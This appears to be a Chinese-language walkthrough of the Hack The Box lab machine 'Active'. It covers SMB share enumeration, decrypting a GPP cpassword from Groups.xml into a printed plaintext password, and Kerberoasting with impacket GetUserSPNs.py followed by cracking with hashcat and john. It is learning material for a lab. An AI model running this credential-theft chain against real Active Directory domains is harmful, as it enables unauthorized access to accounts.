Active(windows smb共享硬盘)

参考资料:smbclient

scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
53/tcp    open  domain        Microsoft DNS 6.1.7601
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2019-01-02 04:44:03Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49182/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

analysing

参考资料:windows active directory

53/tcp open domain Microsoft DNS 6.1.7601
以上结果说明了,这是一台域名服务器(Domain Name System server),active.htb

搜索一下“Microsoft DNS 6.1.7601”,即可得知系统版本——Windows 2008 R2 Standard version

smb协议探测(Server Message Block protocol)

445端口是用来共享文件夹或者打印机的

1
2
3
4
5
nmap --script safe -p445 10.10.10.100

smbclient -L //10.10.10.100

smbmap -H 10.10.10.100

smbclient //10.10.10.100/Replication
WARNING: The “syslog” option is deprecated
protocol negotiation failed: NT_STATUS_CONNECTION_RESET

smbmap

SMBMap - Samba Share Enumerator

用smbmap -h可以查看帮助文档

-R是递归列出某目录

1
2
3
4
5
获得信息:
	.\\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	..
	-r--r--r--              533 Sat Jul 21 18:38:11 2018	Groups.xml

下载文件: smbmap -H 10.10.10.100 -R Replication -A Groups.xml

1
2
3
获得信息2
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
userName="active.htb\SVC_TGS"

破解cpassword

参考资料:Exploiting GPP - Credential Storage in Groups.xml File
工具下载gpprefdecrypt.ps1

1
2
3
cmd.exe 右键以管理员身份运行
cd C:\Users\whale\Desktop
powershell.exe ./gpprefdecrypt.ps1 edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ


GPPstillStandingStrong2k18

问题

期间出现windows不允许执行ps1脚本。
解决办法:以管理员身份运行powershell,输入以下命令,然后输入Y。

1
set-executionpolicy remotesigned

方法二:

kali工具破解:

1
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

域用户提权

smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.10.10.100

可以发现,多了三个目录可读。依次检查这些目录,获得了user.txt。
smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.10.10.100 -R Users -A user.txt

Kerberoasting
GetUserSPNs.py

Kerberoasting是从票据分发服务中破解hash,来获得明文密码。

Kerberos身份验证使用服务主体名称(SPN)来标识关联的帐户。

1
2
3
4
5
6
ldapsearch -x -h 10.10.10.100 -p 389 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2))(serviceprincipalname=*/*))" serviceprincipalname | grep -B 1 servicePrincipalName

locate GetUserSPNs.py

/usr/share/doc/python-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out

1
2
3
4
5
6
7
apt install exim4-config
apt-get install pocl-opencl-icd
apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev
apt-get upgrade hashcat 更新了一下hashcat,然后就可以正常运行了
hashcat -m 13100 GetUserSPNs.out /usr/share/wordlists/rockyou.txt --force --potfile-disable

john --format:krb5tgs GetUserSPNs.out --wordlist=/usr/share/wordlists/rockyou.txt


如果字典里没有正确的密码,hashcat会提示

1
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

这个时候就要换字典,再次尝试,或者放弃。

总结

工作组和域
工作组和域的区别

域一般用在比较大的网络里,需要一台域控服务器,其他计算机要互相访问就要经过它。

工作组比较小(网上邻居),没有控制彼此访问的服务器。

下次继续学习windows域渗透。。。